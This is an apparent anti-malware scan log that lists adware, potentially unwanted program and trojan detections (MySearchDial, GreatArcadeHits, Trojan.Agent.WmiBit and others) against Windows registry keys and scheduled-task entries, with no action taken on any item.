PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{3004627E-F8E9-4E8B-909D-316753CBA923}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\mysearchdial.mysearchdialdskBnd, No Action By User, 5952, 342408, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\mysearchdial.mysearchdialHlpr.1, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}, No Action By User, 5952, 342408, , , , , , 
PUP.Optional.MySearchDial.OL, HKLM\SOFTWARE\CLASSES\mysearchdial.mysearchdialHlpr, No Action By User, 5952, 342408, 1.0.49973, , ame, , , 
PUP.Optional.SuperOptimizer, HKU\S-1-5-20\SOFTWARE\APPDATALOW\{1146AC44-2F03-4431-B4FD-889BC837521F}, No Action By User, 1658, 243667, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FE2730BD-C80E-41F6-AC6A-21FF3521D2DA}, No Action By User, 268, 258187, 1.0.49973, , ame, , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{A26E4F53-0C1D-47E6-93D4-2B1380751BD0}, No Action By User, 5648, 430790, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa, No Action By User, 5648, 430790, 1.0.49973, , ame, , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{FEEB404D-FF5E-4BA3-8E14-BFF9D5D072B1}, No Action By User, 5648, 430785, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{FEEB404D-FF5E-4BA3-8E14-BFF9D5D072B1}, No Action By User, 5648, 430785, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, No Action By User, 5648, 430785, 1.0.49973, , ame, , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{6C49D8F6-A561-478F-8562-B5B6C36B3542}, No Action By User, 5648, 430785, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{6C49D8F6-A561-478F-8562-B5B6C36B3542}, No Action By User, 5648, 430785, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, No Action By User, 5648, 430785, 1.0.49973, , ame, , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C7EE3052-AD50-4721-9A35-2ED1ADF2BEA4}, No Action By User, 5648, 430785, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{C7EE3052-AD50-4721-9A35-2ED1ADF2BEA4}, No Action By User, 5648, 430785, , , , , , 
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3, No Action By User, 5648, 430785, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{7158081D-DF25-4E71-BC14-844441C6B587}, No Action By User, 108, 241084, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\MySearchDial, No Action By User, 108, 241084, 1.0.49973, , ame, , , 
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9EC65580-F30B-49AD-B23D-E6619DA3685B}, No Action By User, 3671, 417162, , , , , , 
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{9EC65580-F30B-49AD-B23D-E6619DA3685B}, No Action By User, 3671, 417162, , , , , , 
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, No Action By User, 3671, 417162, 1.0.49973, , ame, , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\TYPELIB\{5530C971-3D8F-471B-AC49-4CC23FA955E2}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\INTERFACE\{7FBC7ADD-4D75-4685-9BD4-30D3FBDD3AB4}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\INTERFACE\{EE0C9EF1-B2AD-407B-9707-0124CC9BF85E}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{7FBC7ADD-4D75-4685-9BD4-30D3FBDD3AB4}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{EE0C9EF1-B2AD-407B-9707-0124CC9BF85E}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{7FBC7ADD-4D75-4685-9BD4-30D3FBDD3AB4}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{EE0C9EF1-B2AD-407B-9707-0124CC9BF85E}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{5530C971-3D8F-471B-AC49-4CC23FA955E2}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{5530C971-3D8F-471B-AC49-4CC23FA955E2}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, , , , , , 
PUP.Optional.GreatArcadeHits, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D0C21091-FF8E-432C-9006-0540E81BA9D7}, No Action By User, 2537, 168049, 1.0.49973, , ame, , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{042DA63B-0933-403D-9395-B49307691690}, No Action By User, 1874, 169761, 1.0.49973, , ame, , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D3D233D5-9F6D-436C-B6C7-E63F77503B30}, No Action By User, 1874, 168102, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D3D233D5-9F6D-436C-B6C7-E63F77503B30}, No Action By User, 1874, 168102, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, No Action By User, 108, 168579, , , , , , 
PUP.Optional.MySearchDial, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, No Action By User, 108, 168579, , , , , , 
PUP.Optional.MySearchDial, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, No Action By User, 108, 168579, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, No Action By User, 108, 168579, 1.0.49973, , ame, , , 
PUP.Optional.ASK, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1003\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.ASK, HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, No Action By User, 268, 306571, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D7E97865-918F-41E4-9CD0-25AB1C574CE8}, No Action By User, 1874, 168103, , , , , , 
PUP.Optional.InboxToolBar, HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D7E97865-918F-41E4-9CD0-25AB1C574CE8}, No Action By User, 1874, 168103, , , , , , 
PUP.Optional.AppGraffiti, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{6F6A5334-78E9-4D9B-8182-8B41EA8C39EF}, No Action By User, 1008, 167654, 1.0.49973, , ame, , , 
PUP.Optional.CouponBar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\APPID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}, No Action By User, 2370, 167519, , , , , , 
PUP.Optional.CouponBar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\APPID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}, No Action By User, 2370, 167519, , , , , , 
PUP.Optional.CouponBar, HKLM\SOFTWARE\CLASSES\APPID\{4CE516A7-F7AC-4628-B411-8F886DC5733E}, No Action By User, 2370, 167519, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{0400EBCA-042C-4000-AA89-9713FBEDB671}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{0BD19251-4B4B-4B94-AB16-617106245BB7}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{44B29DDD-CF7A-454A-A275-A322A398D93F}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{B2DB115C-8278-4947-9A07-57B53D1C4215}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{B97FC455-DB33-431D-84DB-6F1514110BD5}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{E72E9312-0367-4216-BFC7-21485FA8390B}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\INTERFACE\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{0400EBCA-042C-4000-AA89-9713FBEDB671}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{0BD19251-4B4B-4B94-AB16-617106245BB7}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{44B29DDD-CF7A-454A-A275-A322A398D93F}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{B2DB115C-8278-4947-9A07-57B53D1C4215}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{B97FC455-DB33-431D-84DB-6F1514110BD5}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{E72E9312-0367-4216-BFC7-21485FA8390B}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{0400EBCA-042C-4000-AA89-9713FBEDB671}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{0BD19251-4B4B-4B94-AB16-617106245BB7}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{44B29DDD-CF7A-454A-A275-A322A398D93F}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{B2DB115C-8278-4947-9A07-57B53D1C4215}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{B97FC455-DB33-431D-84DB-6F1514110BD5}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{E72E9312-0367-4216-BFC7-21485FA8390B}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\TYPELIB\{FBC322D5-407E-4854-8C0B-555B951FD8E3}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{FBC322D5-407E-4854-8C0B-555B951FD8E3}, No Action By User, 108, 168583, , , , , , 
PUP.Optional.MySearchDial, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{FBC322D5-407E-4854-8C0B-555B951FD8E3}, No Action By User, 108, 168583, 1.0.49973, , ame, , , 
PUP.Optional.RebateInformer, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{CCB69577-088B-4004-9ED8-FF5BCC83A039}, No Action By User, 2057, 168694, 1.0.49973, , ame, , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\TYPELIB\{B87F8B63-7274-43FD-87FA-09D3B7496148}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{452AE416-9A97-44CA-93DA-D0F15C36254F}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{45CDA4F7-594C-49A0-AAD1-8224517FE979}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{81E852CC-1FD5-4004-8761-79A48B975E29}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{B9F43021-60D4-42A6-A065-9BA37F38AC47}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\INTERFACE\{D83B296A-2FA6-425B-8AE8-A1F33D99FBD6}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{452AE416-9A97-44CA-93DA-D0F15C36254F}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{45CDA4F7-594C-49A0-AAD1-8224517FE979}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{81E852CC-1FD5-4004-8761-79A48B975E29}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{B2CA345D-ADB8-4F5D-AC64-4AB34322F659}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{B9F43021-60D4-42A6-A065-9BA37F38AC47}, No Action By User, 1000000, 0, , , , , , 
Malware.AI.1177501665, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{BF921DD3-732A-4A11-933B-A5EA49F2FD2C}, No Action By User, 1000000, 0, , , , , , 
